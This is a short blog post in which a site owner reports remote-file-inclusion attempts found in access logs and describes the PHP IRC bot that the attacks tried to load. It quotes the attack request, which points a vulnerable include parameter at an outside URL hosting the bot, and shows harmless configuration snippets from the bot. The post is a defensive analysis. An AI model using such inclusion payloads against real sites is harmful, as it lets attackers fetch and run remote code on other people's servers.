Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following

/include/mail.inc.php?skin_board_path=http://website/j1.txt

Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here but it’s likely a local file inclusion type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL or embedded in the current page at the current URL.

Full Disclosure: The Bot Source

In light of full disclosure I’m posting the bot here for your enjoyment. You’ll notice that the bot isn’t very sophisticated and basically just allows for basic IRC commands and proxying like features like sending messages as the bot.

Here’s some short teaser snippets

Snippet 1:

function hajar() {

$channels = '#teamhack #jombang'; // Pisahkan dengan spasi

$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
$showrespone = 0; //1, Nampilin respon dari server irc

Snippet 2:

//Server IRC
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"**************"
);
}
$port = "6667";
//Pesan
$awaymsg = '4[[6TeamHacK 8LaBoRaToRiuMz12]]';

You can find the full source code here.